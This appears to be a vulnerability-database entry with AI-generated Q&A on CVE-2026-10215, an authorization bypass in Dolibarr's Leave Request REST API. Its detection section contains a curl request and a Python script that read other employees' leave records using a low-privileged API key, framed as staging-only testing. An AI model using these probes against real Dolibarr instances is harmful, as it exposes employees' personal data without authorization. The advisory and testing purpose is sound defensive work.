CVE-2026-10215
Improper Authorization in Dolibarr ERP CRM
Publication date: 2026-06-01
Last updated on: 2026-06-01
Assigner: VulDB
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| dolibarr | erp_crm | up to and including 23.0.1 |
| dolibarr | erp_crm | 23.0.0 |
| dolibarr | erp_crm | 23.0.2 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-285 | The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action. |
| CWE-266 | A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor. |
Attack-Flow Graph
AI Powered Q&A
What immediate steps should I take to mitigate this vulnerability?
The immediate and recommended mitigation is to upgrade Dolibarr ERP CRM to version 23.0.2 or later, where the issue is fixed.
The fix corrects the authorization checks in the Leave Request REST API so that the same hierarchy-based and object-level access control the web UI applies is enforced for API requests as well.
Until the upgrade can be applied, reduce exposure of the API: disable the REST API module if it is not needed, remove API keys from low-privileged accounts that have no business need for API access, and review web server access logs for requests to /api/index.php/holidays/ that come from keys belonging to users who should not see other employees' leave requests.
Can you explain this vulnerability to me?
CVE-2026-10215 is a security vulnerability in Dolibarr ERP CRM up to version 23.0.1, specifically in the Leave Request REST API component. It is an improper authorization flaw in the use of the function checkUserAccessToObject that allows a low-privileged, authenticated user to bypass object-level access controls.
An attacker can read leave request details of other employees through the API, even though the web UI correctly denies the same access. The API performs a weaker object-level check than the web UI: it passes only the numeric record ID to checkUserAccessToObject, so the hierarchy-based permission checks (whether the requester owns the request, is its approver, or is above the owner in the user hierarchy) that the web UI applies are never evaluated.
The root cause is inconsistent access control enforcement between the API and the web UI, resulting in unauthorized disclosure of sensitive leave data.
How can this vulnerability impact me?
This vulnerability can lead to unauthorized disclosure of sensitive information such as leave schedules, approver details, and other business data of employees.
An attacker with limited permissions can exploit the API remotely to access data they should not be authorized to see, potentially enabling social engineering attacks or further exploitation within the organization.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the Leave Request REST API for missing object-level authorization: using a low-privileged account, attempt to read leave requests belonging to other users via the endpoint /api/index.php/holidays/{id} and compare the result with what the same account can see in the web UI.
A practical method uses two test accounts: a victim user who owns at least one leave request (note its ID), and an attacker user with ordinary, non-manager permissions and an API key. Using the attacker's API key, request the victim's leave request by ID and observe whether the record is returned. Dolibarr's REST API authenticates with the DOLAPIKEY header, so the request looks like this:
Example command using curl to test unauthorized access:
- curl -s -H "DOLAPIKEY: <attacker_api_key>" -H "Accept: application/json" https://<dolibarr_instance>/api/index.php/holidays/8
If the response is HTTP 200 with the leave request details (owner, dates, approver) for an ID the attacker does not own and cannot open in the web UI, the vulnerability is present. A patched instance should instead return an authorization error (HTTP 401 or 403).
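The two-account check described above, automated as an added example (this is not Dolibarr project code and not part of the original advisory). It assumes the DOLAPIKEY header for API authentication, the /api/index.php/holidays/{id} endpoint named in the text, and that the returned JSON carries the owner's user id in a field called fk_user; all three are labelled as assumptions in the code. The classification logic is kept separate from the HTTP call so it can be reasoned about (and tested) without a live instance.

```python
"""Probe Dolibarr's Leave Request REST API for horizontal authorization bypass.

Added example, not Dolibarr project code. Assumptions:
- Authentication uses the DOLAPIKEY header (the user's API key from the user card).
- Leave requests are served at /api/index.php/holidays/{id}, as named in the advisory.
- The JSON for a leave request holds the owner's user id in 'fk_user'; adjust if your
  version names the field differently.
"""
import json
import sys
import urllib.error
import urllib.request


def fetch_leave_request(base_url, api_key, leave_id, timeout=10):
    """GET one leave request as the given API key; return (http_status, body_or_None)."""
    url = f"{base_url.rstrip('/')}/api/index.php/holidays/{int(leave_id)}"
    req = urllib.request.Request(
        url,
        headers={"DOLAPIKEY": api_key, "Accept": "application/json"},  # assumed auth header
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, json.loads(resp.read().decode("utf-8"))
    except urllib.error.HTTPError as err:
        raw = err.read().decode("utf-8", errors="replace")
        try:
            return err.code, json.loads(raw)
        except ValueError:
            return err.code, None


def classify(status, body, attacker_user_id):
    """Interpret one attacker-side response.

    VULNERABLE  - 200 and the record belongs to another user (object-level bypass)
    OWN_RECORD  - 200 but the record is the attacker's own (nothing leaked)
    DENIED      - 401/403: the object-level check held
    NOT_FOUND   - 404: no such id (or hidden as not-found)
    UNEXPECTED  - anything else; inspect by hand
    """
    if status == 200 and isinstance(body, dict):
        owner = body.get("fk_user")  # assumed field name for the request owner
        try:
            owner_id = int(owner)
        except (TypeError, ValueError):
            return "UNEXPECTED"
        return "OWN_RECORD" if owner_id == int(attacker_user_id) else "VULNERABLE"
    if status in (401, 403):
        return "DENIED"
    if status == 404:
        return "NOT_FOUND"
    return "UNEXPECTED"


def probe(base_url, attacker_key, attacker_user_id, leave_ids):
    """Try each leave-request id with the low-privileged key; map id -> verdict."""
    return {
        lid: classify(*fetch_leave_request(base_url, attacker_key, lid), attacker_user_id)
        for lid in leave_ids
    }


if __name__ == "__main__":
    # usage: python probe_holidays.py https://dolibarr.example.com <attacker_api_key> <attacker_user_id> 8 9 10
    if len(sys.argv) < 5:
        sys.exit(__doc__)
    base, key, uid, *ids = sys.argv[1:]
    for lid, verdict in probe(base, key, uid, ids).items():
        print(f"holidays/{lid}: {verdict}")
```

Run it against a staging copy, never production, with IDs of leave requests you created as the victim user. Any VULNERABLE verdict for an ID the attacker account cannot open in the web UI confirms the inconsistency the advisory describes; after upgrading to a fixed version the same IDs should come back DENIED.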
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability in Dolibarr ERP CRM allows unauthorized horizontal data access via the Leave Request API, enabling a low-privileged user to read leave request data of other ordinary users within the same entity.
This unauthorized disclosure of sensitive employee leave information could lead to violations of data privacy principles found in regulations such as GDPR and HIPAA, which require strict access controls and protection of personal and sensitive data.
Because the API bypasses proper authorization checks that are enforced in the Web UI, this inconsistency increases the risk of data exposure, potentially impacting compliance with standards that mandate confidentiality and proper authorization mechanisms.
Upgrading to version 23.0.2, which includes a fix for this issue, is recommended to restore proper access controls and help maintain compliance with such regulations.